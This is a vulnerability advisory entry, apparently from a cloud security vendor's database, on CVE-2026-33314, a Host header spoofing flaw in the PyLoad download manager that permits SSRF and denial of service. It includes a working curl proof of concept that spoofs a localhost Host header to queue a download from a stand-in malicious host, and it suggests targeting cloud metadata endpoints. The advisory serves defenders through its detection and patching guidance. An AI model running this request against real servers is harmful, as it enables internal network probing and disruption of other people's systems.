
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33314 is a Host Header Spoofing vulnerability in PyLoad (pyload-ng), a free and open-source download manager written in Python. The flaw exists in the @local_check decorator, which is intended to restrict access to the Click'N'Load API to local connections only. Unauthenticated external attackers can bypass this restriction by spoofing the Host header, enabling Server-Side Request Forgery (SSRF) and Denial of Service (DoS). All versions of pyload-ng prior to 0.5.0b3.dev97 are affected. The vulnerability was published on March 18, 2026, and carries a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory).
The root cause is improper authentication and origin validation (CWE-287, CWE-346) in the @local_check decorator used to guard Click'N'Load API endpoints. The decorator is designed to permit only requests originating from localhost (127.0.0.1), but it validates locality based on the HTTP Host header rather than the actual network source address. An unauthenticated remote attacker can craft a POST request to the /flash/add endpoint with a spoofed Host: 127.0.0.1:9666 header, bypassing the local-only restriction entirely. This is also classified as CWE-918 (Server-Side Request Forgery) because the bypassed API allows the attacker to instruct the PyLoad server to fetch arbitrary URLs (GitHub Advisory).
Successful exploitation allows unauthenticated remote attackers to add arbitrary URLs to PyLoad's download queue, causing the server to make outbound HTTP requests to attacker-controlled or internal network resources (SSRF). This can be leveraged to probe internal services, access metadata endpoints (e.g., cloud instance metadata), or interact with internal APIs not otherwise exposed externally. Additionally, attackers can queue extremely large files to exhaust the server's disk storage and network bandwidth, resulting in a Denial of Service condition. Confidentiality impact is limited (no direct data exfiltration), but integrity and availability are both degraded (GitHub Advisory).
A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of a concrete curl command demonstrating the Host Header Spoofing technique. The exploit requires no authentication and no user interaction, making it trivially executable by any network-accessible attacker. As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.006% (very low probability of exploitation in the near term), and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
/flash/add endpoint is accessible on the target instance.http://<pyload-external-ip>:<port>/flash/add with the Host header set to 127.0.0.1:9666 to impersonate a local connection and bypass the @local_check decorator.urls parameter pointing to an internal resource (e.g., http://169.254.169.254/latest/meta-data/ for cloud metadata) or an attacker-controlled server to receive the outbound request:curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \
-H "Host: 127.0.0.1:9666" \
-d "urls=http://malicious.com/payload.bin" \
-d "package=MaliciousPackage"/flash/add originating from external IP addresses with a Host header value of 127.0.0.1:9666; repeated or bulk entries in the download queue from unexpected sources.The vulnerability is patched in pyload-ng version 0.5.0b3.dev97, which corrects the @local_check decorator to validate the actual source IP address rather than the Host header. Users should upgrade to this version or later immediately. As interim workarounds: restrict network access to the Click'N'Load API port (default 9666) using firewall rules to allow only trusted local clients; implement rate limiting on download queue submissions; and monitor download queue activity for anomalous entries. Avoid exposing the PyLoad web interface directly to the internet (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."